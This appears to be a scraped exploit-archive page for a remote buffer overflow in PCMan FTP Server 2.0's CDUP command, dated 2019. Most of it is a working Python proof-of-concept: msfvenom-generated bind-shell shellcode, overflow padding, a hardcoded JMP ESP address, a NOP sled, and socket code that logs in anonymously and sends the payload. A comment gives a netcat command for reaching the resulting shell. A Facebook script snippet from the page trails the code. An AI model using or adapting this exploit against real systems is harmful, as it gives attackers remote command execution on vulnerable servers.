PCMan FTP Server 2.0 CDUP Remote Buffer Overflow
PCMan FTP Server version 2.0 CDUP remote buffer overflow exploit.
db06526f034129dc1fe951edae491f7a#!/usr/bin/python
import socket, sys, os, time print "n===============================n"
print " PCMan FTP Server 2.0 - 'CDUP' Remote Buffer Overflow n "
print " Date: 23/03/2019 n "
print " Affected Software: PCMan 2.0 n "
print " Tested on Mincrsoft Windows XP Professional Version 2002 SP2 n "
print " Author: Sachin Wagh n "
print " Twitter: @tiger_tigerboy n "
print "=================================n"
#msfvenom -p windows/shell_bind_tcp LPORT=1144 -b 'x0ax00x0d' -f c
#nc taget_ip 4444
shellcode=("xbbxb6x9bxb7xa8xdaxdfxd9x74x24xf4x5ax29xc9xb1"
"x53x83xeaxfcx31x5ax0ex03xecx95x55x5dxecx42x1b"
"x9ex0cx93x7cx16xe9xa2xbcx4cx7ax94x0cx06x2ex19"
"xe6x4axdaxaax8ax42xedx1bx20xb5xc0x9cx19x85x43"
"x1fx60xdaxa3x1exabx2fxa2x67xd6xc2xf6x30x9cx71"
"xe6x35xe8x49x8dx06xfcxc9x72xdexffxf8x25x54xa6"
"xdaxc4xb9xd2x52xdexdexdfx2dx55x14xabxafxbfx64"
"x54x03xfex48xa7x5dxc7x6fx58x28x31x8cxe5x2bx86"
"xeex31xb9x1cx48xb1x19xf8x68x16xffx8bx67xd3x8b"
"xd3x6bxe2x58x68x97x6fx5fxbex11x2bx44x1ax79xef"
"xe5x3bx27x5ex19x5bx88x3fxbfx10x25x2bxb2x7bx22"
"x98xffx83xb2xb6x88xf0x80x19x23x9exa8xd2xedx59"
"xcexc8x4axf5x31xf3xaaxdcxf5xa7xfax76xdfxc7x90"
"x86xe0x1dx0cx8ex47xcex33x73x37xbexf3xdbxd0xd4"
"xfbx04xc0xd6xd1x2dx69x2bxdax40x36xa2x3cx08xd6"
"xe2x97xa4x14xd1x2fx53x66x33x18xf3x2fx55x9fxfc"
"xafx73xb7x6ax24x90x03x8bx3bxbdx23xdcxacx4bxa2"
"xafx4dx4bxefx47xedxdex74x97x78xc3x22xc0x2dx35"
"x3bx84xc3x6cx95xbax19xe8xdex7exc6xc9xe1x7fx8b"
"x76xc6x6fx55x76x42xdbx09x21x1cxb5xefx9bxeex6f"
"xa6x70xb9xe7x3fxbbx7ax71x40x96x0cx9dxf1x4fx49"
"xa2x3ex18x5dxdbx22xb8xa2x36xe7xc8xe8x1ax4ex41"
"xb5xcfxd2x0cx46x3ax10x29xc5xcexe9xcexd5xbbxec")
target = sys.argv[1]
port = int(sys.argv[2])
evil="A"*2006
evil+="x27xb1xfax77" #SHLWAPI.dll this dll have to JMP to ESP address
evil+="x90"*20
evil+=shellcode
#evil+="x90"*(2220-len(evil))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,port)) #Connect to FTP server
s.recv(1024) #Receive 1024 bytes from FTP server
print "[+] Payload Sent Successfully"
s.send('USER anonymousrn')
s.recv(1024)
s.send('PASS anonymousrn')
s.recv(1024)
s.send('CDUP ' + evil + 'rn') #Send CDUP vulnerable command with our evil data
s.recv(1024)
s.close() #Close the socket
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "http://connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.8&appId=409115965821184";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
Gloss